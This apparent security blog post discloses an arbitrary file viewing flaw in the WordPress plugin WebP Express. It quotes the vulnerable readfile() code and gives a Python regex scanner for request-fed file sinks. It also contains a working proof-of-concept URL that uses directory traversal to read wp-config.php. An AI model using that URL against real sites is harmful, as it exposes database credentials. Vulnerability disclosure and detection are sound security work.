A New Addition to Our Proactive Monitoring Caught an Arbitrary File Viewing Vulnerability in a WordPress Plugin in Less Than a Day
Earlier today, in detailing an arbitrary file viewing vulnerability that had been fixed in a WordPress plugin, we noted that looking at the code from that had led us to improve our detection of that type of vulnerability in our proactive monitoring of changes being made to plugins (which tries to catch serious vulnerabilities when they are introduced into plugins) and in our Plugin Security Checker. It didn’t even take a day before that improvement allowed us to spot an arbitrary file viewing vulnerability in the plugin WebP Express through that proactive monitoring. That type of vulnerability is likely to be exploited, though it usually doesn’t cause a website to be hacked.
This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker, since it can alert you if plugins you use possibly contain a similar issue (and possibly contain a lot of other serious vulnerabilities). From there, if you are a paying customer of our service you can suggest/vote for the plugin to receive a security review that will check over that, or you can order the same type of review separately.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously fully disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.
Technical Details
The first code in the file /test/test-run.php outputs the contents of whatever file is specified by the GET input “stream-webp-image”, with no check on the value:

```php
if (isset($_GET['stream-webp-image'])) {
    header('Content-type: image/webp');
    // The request value is passed straight to readfile(); the '@' only hides errors.
    if (@readfile($_GET['stream-webp-image']) === false) {
```
Using directory traversal in that input, any file on the website can be viewed.
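The pattern at issue here, a file-reading function whose argument comes straight from request input, is simple enough to flag mechanically, which is what makes it a natural target for the kind of detection improvement the post describes. The following is an added illustration written for this post, not the code behind our Plugin Security Checker or proactive monitoring: a small Python scan that reports PHP file-disclosure sinks whose first argument is a request superglobal. It is run over a constructed fragment modelled on the excerpt above and over a constructed, hypothetical hardened variant (not the plugin’s actual fix) that only accepts a file name, strips any directory part with basename() and confirms with realpath() that the result still sits under a fixed directory.

```python
"""Flag PHP file-reading sinks whose argument comes straight from request input.

Added illustration for this post; it is not the code behind the Plugin Security
Checker or the proactive monitoring described above. Both samples are constructed.
"""
import re

# Constructed sample modelled on the excerpt from /test/test-run.php quoted in
# the post, closed off into a complete fragment so the scanner has full input.
VULNERABLE_SAMPLE = """<?php
if (isset($_GET['stream-webp-image'])) {
    header('Content-type: image/webp');
    if (@readfile($_GET['stream-webp-image']) === false) {
        exit;
    }
}
"""

# Constructed hardened variant (a hypothetical fix, not the plugin's actual
# patch): the request only names a file, basename() strips any directory part,
# and realpath() confirms the resolved path still sits under a fixed directory.
HARDENED_SAMPLE = """<?php
$base = realpath(__DIR__ . '/samples');
$name = basename((string) ($_GET['stream-webp-image'] ?? ''));
$path = $base === false ? false : realpath($base . '/' . $name);
if ($path !== false && strpos($path, $base . '/') === 0) {
    header('Content-type: image/webp');
    readfile($path);
}
"""

# PHP functions and constructs that disclose or execute a file named by their
# first argument. Longer names come before their prefixes so they match first.
FILE_SINKS = (
    "readfile", "file_get_contents", "fpassthru", "fopen", "show_source",
    "highlight_file", "include_once", "require_once", "include", "require", "file",
)

# A request superglobal indexed by a key, e.g. $_GET['stream-webp-image'].
REQUEST_SOURCE = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]"

# Optional '@' error suppression, the sink, an optional '(' (include/require
# may omit it), then the superglobal as the *first* argument. Anything else in
# between, such as a sanitising call, breaks the match; the rule only fires
# when the request value reaches the sink with nothing in the way.
SINK_RE = re.compile(
    r"(?:@\s*)?\b(" + "|".join(FILE_SINKS) + r")\s*\(?\s*(" + REQUEST_SOURCE + r")"
)


def find_request_fed_file_sinks(php_source: str) -> list[dict]:
    """Return one finding per sink call whose first argument is request input."""
    findings = []
    lines = php_source.splitlines()
    for match in SINK_RE.finditer(php_source):
        line_no = php_source.count("\n", 0, match.start()) + 1
        findings.append({
            "line": line_no,
            "sink": match.group(1),
            "source": match.group(2),
            "snippet": lines[line_no - 1].strip(),
        })
    return findings


if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        hits = find_request_fed_file_sinks(sample)
        print(f"{label}: {len(hits)} finding(s)")
        for hit in hits:
            print(f"  line {hit['line']}: {hit['sink']}() fed by {hit['source']}  <- {hit['snippet']}")
```

The scan is deliberately a plain regular expression rather than a parser: it catches exactly the shape in the excerpt (request value as the first argument of the sink) and goes quiet as soon as anything sits between the two, which is why the hardened sample produces no finding. That also means it will miss a value that is copied into a variable first, so a real checker would need data-flow tracking on top of this.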
Proof of concept
The following proof of concept will generate a file with the contents of the WordPress configuration file.
Make sure to replace “[path to WordPress]” with the location of WordPress.
http://[path to WordPress]/wp-content/plugins/webp-express/test/test-run.php?stream-webp-image=../../../../wp-config.php
Looks like this vulnerability is closed. I tried the test, and got a 404. Can you verify this with the developer?
The best way for everyone to check if vulnerabilities in WordPress plugins have been fixed is to use our service as we verify if they have been truly fixed (we often find that plugin developers believe they have fixed vulnerabilities when they haven’t). We also warn people that they are using vulnerable plugins before they have been attempted to be fixed, which is even more important.
In this case, if you are trying to test it and getting a 404 with the most recent version of the plugin, then you are doing something wrong.